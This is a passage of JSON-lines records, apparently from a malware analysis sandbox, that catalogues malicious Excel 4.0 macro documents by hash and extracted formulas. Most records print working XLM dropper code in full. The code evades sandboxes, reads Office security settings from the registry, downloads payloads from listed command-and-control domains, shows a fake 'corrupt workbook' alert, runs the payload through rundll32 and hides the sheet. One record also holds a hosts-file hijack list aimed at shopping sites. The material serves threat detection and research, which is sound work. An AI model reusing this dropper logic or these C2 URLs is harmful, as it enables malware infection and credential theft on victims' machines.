255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"g0NV8Lqhyd\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5f5a643dc9bcbddc71d2cd308d033c76ebed9b7149f3abd89ddfeeaccae24000"},"analysis":{"reported":"2020-04-09T16:16:34Z","score":10},"files":[{"filename":"5f5a643dc9bcbddc71d2cd308d033c76ebed9b7149f3abd89ddfeeaccae24000","filesize":160768,"md5":"ef83b3690cb9364ae5ae36c0ba1205f4","sha1":"94dd53a5722e2b98938502df224403ac6b5289cd","sha256":"5f5a643dc9bcbddc71d2cd308d033c76ebed9b7149f3abd89ddfeeaccae24000","sha512":"6827055c8d64b3a9568af5c0035a912476d7b64c5c835488c46ce1a9747a5b5fae55060dd167c8016b02465e974530a3b238fc29d8435a6a5dca9d0ef4a22230","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5f5a643dc9bcbddc71d2cd308d033c76ebed9b7149f3abd89ddfeeaccae24000.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Seuj1z1Faf\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5f76316d68168c840a2da41d347d3bdaa057f8fc82f13c668ee0a6494bac61fb"},"analysis":{"reported":"2020-04-09T16:16:34Z","score":10},"files":[{"filename":"5f76316d68168c840a2da41d347d3bdaa057f8fc82f13c668ee0a6494bac61fb","filesize":112128,"md5":"10c2551d384e1de2c17e67c824873cce","sha1":"45a67311e7bce3ecbf99af2275d243eeabe8e322","sha256":"5f76316d68168c840a2da41d347d3bdaa057f8fc82f13c668ee0a6494bac61fb","sha512":"2ad7ca8a35e8a6135020452dbdbf0d53411063d81bdf8f2e231cffa8cf97f46f31e7de31d60e44efbea122dc40505f58b79008a2289e6c50c9e570448fbcb6fd","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5f76316d68168c840a2da41d347d3bdaa057f8fc82f13c668ee0a6494bac61fb.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5f831c37fd832c76b42a7ca17ca92722deb613f37e40ef34cda21353c83af284"},"analysis":{"reported":"2020-04-09T16:16:34Z","score":10},"files":[{"filename":"5f831c37fd832c76b42a7ca17ca92722deb613f37e40ef34cda21353c83af284","filesize":209408,"md5":"93ae1f82103121d4800791eafc4f2075","sha1":"444c3efaca7d37266affbd42faa48fdec6520ee0","sha256":"5f831c37fd832c76b42a7ca17ca92722deb613f37e40ef34cda21353c83af284","sha512":"7b403963f192a648eccef6bb643d4a15d7ba30f04352fea9ce4f3152718f57543c27bf9798d60c8b20e08ed027f0e6780931fe6d748070f747a648c7bdef2140","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5f831c37fd832c76b42a7ca17ca92722deb613f37e40ef34cda21353c83af284.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"SYRu01FoVW\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5fa162643318ccde319db46b9ec68def4adca33f63259b74f9ff5ded8b1626cf"},"analysis":{"reported":"2020-04-09T16:16:34Z","score":10},"files":[{"filename":"5fa162643318ccde319db46b9ec68def4adca33f63259b74f9ff5ded8b1626cf","filesize":152576,"md5":"8f89a22f7db134077e8991c30346ec4a","sha1":"0eae1b68fec9fb0e14fc14a1abc7cc245ffcf030","sha256":"5fa162643318ccde319db46b9ec68def4adca33f63259b74f9ff5ded8b1626cf","sha512":"9ae646ae7c19593e7c269406f293fff6dc964da966b181e0827c7b8f121a759f2c62a695c354747ad32a9a21e8ac0f6c6245afa302b5ee4ab54ece3873f5fc63","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5fa162643318ccde319db46b9ec68def4adca33f63259b74f9ff5ded8b1626cf.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"t9qBJK1bvx\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5fa3db58de878dda31a17003c993ff39284dc828c22d5c8937be83fc6b13bd9b"},"analysis":{"reported":"2020-04-09T16:16:34Z","score":10},"files":[{"filename":"5fa3db58de878dda31a17003c993ff39284dc828c22d5c8937be83fc6b13bd9b","filesize":185344,"md5":"84d7d652b22b8247578e9152e66e87e4","sha1":"f6a6a15bc4b788365ab5a5848ee27d5955d83f82","sha256":"5fa3db58de878dda31a17003c993ff39284dc828c22d5c8937be83fc6b13bd9b","sha512":"b60f99d211f1e6ae93b73e71edfacde3f5dd30a9a1eda16025035b741d4eb1e56114986d9a2d186ae0716d7cdbc524b675d9cf8f816dee1768133c1990b93d4d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5fa3db58de878dda31a17003c993ff39284dc828c22d5c8937be83fc6b13bd9b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5faa563c459c8b51ef5b9e7f45fa0d5d6d7768618dbbe5f167cf8226af3e8fbf"},"analysis":{"reported":"2020-04-09T16:16:34Z","score":10},"files":[{"filename":"5faa563c459c8b51ef5b9e7f45fa0d5d6d7768618dbbe5f167cf8226af3e8fbf","filesize":104448,"md5":"bd318bcc5ecbbaa3aac4fef714f291fc","sha1":"be8ccbff2913b9cb811fc5165d28cd9ae52b37cc","sha256":"5faa563c459c8b51ef5b9e7f45fa0d5d6d7768618dbbe5f167cf8226af3e8fbf","sha512":"e0eabe41c23d19f1140b7437a1e0837177d4a9c0f625a79e418876eb1716b4e78516d700f950e8d0139d38a59b49b99d40f7606a15d3de9e319bd974ccda1e3d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5faa563c459c8b51ef5b9e7f45fa0d5d6d7768618dbbe5f167cf8226af3e8fbf.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"IfWYfxgplp\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5fbb2fc4981e0ab4e9605aacb43a59989f0f211c7e08ede3d306d36bef915c7e"},"analysis":{"reported":"2020-04-09T16:16:34Z","score":10},"files":[{"filename":"5fbb2fc4981e0ab4e9605aacb43a59989f0f211c7e08ede3d306d36bef915c7e","filesize":124416,"md5":"8777292ccd6853c289058b2c97e2dc94","sha1":"a7e7229e22000f6e1cfe861a0350cff3783519f8","sha256":"5fbb2fc4981e0ab4e9605aacb43a59989f0f211c7e08ede3d306d36bef915c7e","sha512":"84d9beec259fda26f756e093ab170bdc3ee55e6dbb1f4238ead0eaf39f8552127d91451d29612cf3498fb98a706396b1e368c632d89da84ae36ca11a8d492ae5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5fbb2fc4981e0ab4e9605aacb43a59989f0f211c7e08ede3d306d36bef915c7e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"SUM(R$64C$3,532500,122880)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5fc0dff948b0a660f2d4a3cb489e006c5b98f99d84c712ed15ba251a53167378"},"analysis":{"reported":"2020-04-09T16:16:34Z","score":10},"files":[{"filename":"5fc0dff948b0a660f2d4a3cb489e006c5b98f99d84c712ed15ba251a53167378","filesize":185344,"md5":"5651e5ca3a1621ce8194d63f04d365c2","sha1":"af8f915e97ee7ffe3b5022e3e656b8dae57660d4","sha256":"5fc0dff948b0a660f2d4a3cb489e006c5b98f99d84c712ed15ba251a53167378","sha512":"c446fef44eebac6e3db25e052dc9a3627d7cb1defd325f3563b70716b44f6e8d923bc1d37679ef39a6a27599a36667319fd36af52dc22dc56104bdfda5e58f72","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5fc0dff948b0a660f2d4a3cb489e006c5b98f99d84c712ed15ba251a53167378.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/vbdh72F"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5fcb00e11cc3ec991d0a217802c3e1d4b8da6257c333d3d34415b096463fd8b5"},"analysis":{"reported":"2020-04-09T16:16:34Z","score":10},"files":[{"filename":"5fcb00e11cc3ec991d0a217802c3e1d4b8da6257c333d3d34415b096463fd8b5","filesize":145920,"md5":"6043e795efb40fc627e67e4945a9a573","sha1":"15bd4bdbfe6a6aca1c7709661e5060902a554c41","sha256":"5fcb00e11cc3ec991d0a217802c3e1d4b8da6257c333d3d34415b096463fd8b5","sha512":"45afae0105b72979b5badf3dd83d737b419a6b0a360cd3c6f103101c2aec1988d453e593c568376a05b6035e3dff87d46ff4bc0dd8a3e0b571438ef0dd0144b6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5fcb00e11cc3ec991d0a217802c3e1d4b8da6257c333d3d34415b096463fd8b5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://uenoeakd.site/grwrg24g2g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"2SroJO2sIN\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5fce919e5e74f2abd77941996a447f3017ab1e576f57da463a943937ff86c1ec"},"analysis":{"reported":"2020-04-09T16:16:34Z","score":10},"files":[{"filename":"5fce919e5e74f2abd77941996a447f3017ab1e576f57da463a943937ff86c1ec","filesize":152576,"md5":"765dff55731bab1d810b6be0a81da001","sha1":"b3b3bc503a8d25b4894660b249005bb68f928afd","sha256":"5fce919e5e74f2abd77941996a447f3017ab1e576f57da463a943937ff86c1ec","sha512":"56b24348592b0c4e53ffe9abfe4c1a164d5e0616f5d326abd1f2913fb3bb476f69a4b3b7115bef553ed615b3e35fcd4d3eb56038f9ee2a4393548cc42038d1cd","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5fce919e5e74f2abd77941996a447f3017ab1e576f57da463a943937ff86c1ec.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"llcJqm10C5\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5fea5b2a7082db3d3f7309ea88c5c59b910c26b0aad0a4d94e3ae5bbcf0fbe24"},"analysis":{"reported":"2020-04-09T16:16:34Z","score":10},"files":[{"filename":"5fea5b2a7082db3d3f7309ea88c5c59b910c26b0aad0a4d94e3ae5bbcf0fbe24","filesize":206336,"md5":"f3eb4008b8530b0b67fad905c624dff6","sha1":"5a40d424f5444e80b8ff1e2b14a5b5e66af977ae","sha256":"5fea5b2a7082db3d3f7309ea88c5c59b910c26b0aad0a4d94e3ae5bbcf0fbe24","sha512":"3763c4c427bd2f3ac0010bded44090f8ad9a61055e323ec1bed5744208a5796c847dbdf5d110fd6eaada35f288c13a38531671a1f39df97a968855e39ff71a5b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5fea5b2a7082db3d3f7309ea88c5c59b910c26b0aad0a4d94e3ae5bbcf0fbe24.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"CXRTkKW65l\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6005339fea1bb5a7d3e6a8949a1a023bff95a69c04064c9cf29ae50a3a79f012"},"analysis":{"reported":"2020-04-09T16:16:34Z","score":10,"tags":["macro"]},"signatures":[{"name":"Suspicious Office macro","score":8,"tags":["macro"],"yara_rule":"office_macro_on_action","desc":"Office document macro which triggers in special circumstances - often malicious."}],"files":[{"filename":"6005339fea1bb5a7d3e6a8949a1a023bff95a69c04064c9cf29ae50a3a79f012","filesize":715264,"md5":"338df09a6d8befa0d719b73690f75995","sha1":"8cdc2df35542a9de2d0ac7fb6c0036eede80aef9","sha256":"6005339fea1bb5a7d3e6a8949a1a023bff95a69c04064c9cf29ae50a3a79f012","sha512":"e6fb421465a6856e18881accf06155371a402d62e6a0a80c7187ccb714df3cfd5a43e830110daea5ffd2c752051823daa41478968c744e815165b6a522bdd119","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6005339fea1bb5a7d3e6a8949a1a023bff95a69c04064c9cf29ae50a3a79f012.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"HYPERLINK(\"http://a.hiphotos.baidu.com/album/pic/item/29381f30e924b89927f5c2f46e061d950b7bf635.jpg\",\"\")\nHYPERLINK(\"http://a.hiphotos.baidu.com/album/pic/item/29381f30e924b89927f5c2f46e061d950b7bf635.jpg\",\"\")\nLEFT(SUBSTITUTE(SUBSTITUTE(SUBSTITUTE(\"\r\n118.244.78.30 s.taobao.com indivual line. Tdss individual lins\r\n118.244.78.30 search.paipai.com  source server \r\n118.244.78.30 search1.paipai.com  x client hostl line. Th\r\n118.244.78.30 tmall.com\r\n118.244.78.30 3c.taobao.com indivual line. Tdss individual li\r\n118.244.78.30 spu.taobao.com x client hostl line indivual line. Tdss individual line\r\n118.244.78.30 list.taobao.com source server indivual line. Tdss individual line. The IP k\r\n118.244.78.30 list.tmall.com indivuale indivual line. Tdss individual line. The I\",\"|\",\"\n\"),\"[{\",),\"}]\",),1)\nSUBSTITUTE(SUBSTITUTE(SUBSTITUTE(\"\r\n118.244.78.30 s.taobao.com indivual line. Tdss individual lins\r\n118.244.78.30 search.paipai.com  source server \r\n118.244.78.30 search1.paipai.com  x client hostl line. Th\r\n118.244.78.30 tmall.com\r\n118.244.78.30 3c.taobao.com indivual line. Tdss individual li\r\n118.244.78.30 spu.taobao.com x client hostl line indivual line. Tdss individual line\r\n118.244.78.30 list.taobao.com source server indivual line. Tdss individual line. The IP k\r\n118.244.78.30 list.tmall.com indivuale indivual line. Tdss individual line. The I\",\"|\",\"\n\"),\"[{\",),\"}]\",)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"60523ae9abf2b47d5fadd5ed39d7aa7ad9bc6cf84c8b17a6874ece7663a997fc"},"analysis":{"reported":"2020-04-09T16:16:34Z","score":10},"files":[{"filename":"60523ae9abf2b47d5fadd5ed39d7aa7ad9bc6cf84c8b17a6874ece7663a997fc","filesize":214016,"md5":"051448de5839ce23ff4770558d6b651e","sha1":"095ead5b476987ada2421bda0d14a7c92c3e1463","sha256":"60523ae9abf2b47d5fadd5ed39d7aa7ad9bc6cf84c8b17a6874ece7663a997fc","sha512":"162d263b521828147716b415f3aac81e33df5b2827ef58fea1dbf6c6037f35f946cadf23ab3bf9a77ff92d03888d176190e489522786749664b9e1e0983fbe06","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"60523ae9abf2b47d5fadd5ed39d7aa7ad9bc6cf84c8b17a6874ece7663a997fc.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv42g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv42g\",\"c:\\Users\\Public\\bug65ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"gIaFdmTAOq\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6059c6b19f58eb0fdda3bbee5cabf5bdaa5ca6d375e8d36d517f252902500d4d"},"analysis":{"reported":"2020-04-09T16:16:34Z","score":10},"files":[{"filename":"6059c6b19f58eb0fdda3bbee5cabf5bdaa5ca6d375e8d36d517f252902500d4d","filesize":144384,"md5":"d0773fc4c0612596f207bb224b42bb7a","sha1":"4ae0c4da4cb5eeb3909bb1b9c86d10cd70a57b60","sha256":"6059c6b19f58eb0fdda3bbee5cabf5bdaa5ca6d375e8d36d517f252902500d4d","sha512":"614d503e32622478f1c0347e18a6a9b027d0faa07ddbb012246e1e2dc9e4008a4679a5c91d724789e2a1357742cfa575e4201ea6b2e9eca1c05aab369a11973d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6059c6b19f58eb0fdda3bbee5cabf5bdaa5ca6d375e8d36d517f252902500d4d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/12341324rfefv"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"JCmwkPnGfS\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"606ba623afe0be8a58ea0249d306b84d4fb91c6195b065e89a7f02ac6961f588"},"analysis":{"reported":"2020-04-09T16:16:35Z","score":10},"files":[{"filename":"606ba623afe0be8a58ea0249d306b84d4fb91c6195b065e89a7f02ac6961f588","filesize":167936,"md5":"3260f8424ae83bf6571a388de27e7151","sha1":"fc47372ba86c6978b6aada0a879357a26dfbfac3","sha256":"606ba623afe0be8a58ea0249d306b84d4fb91c6195b065e89a7f02ac6961f588","sha512":"460660ab9e651df78cd981df3478fd5373ef02a2f4541c9d9ec119364334d7fdbe2dbe0d88369678a6d56c5eee38dd973271715660836fd4b596f35b283fa0bb","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"606ba623afe0be8a58ea0249d306b84d4fb91c6195b065e89a7f02ac6961f588.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"pDF5WUszFT\",TRUE)\nGOTO(R$0C$19)"}}}]}
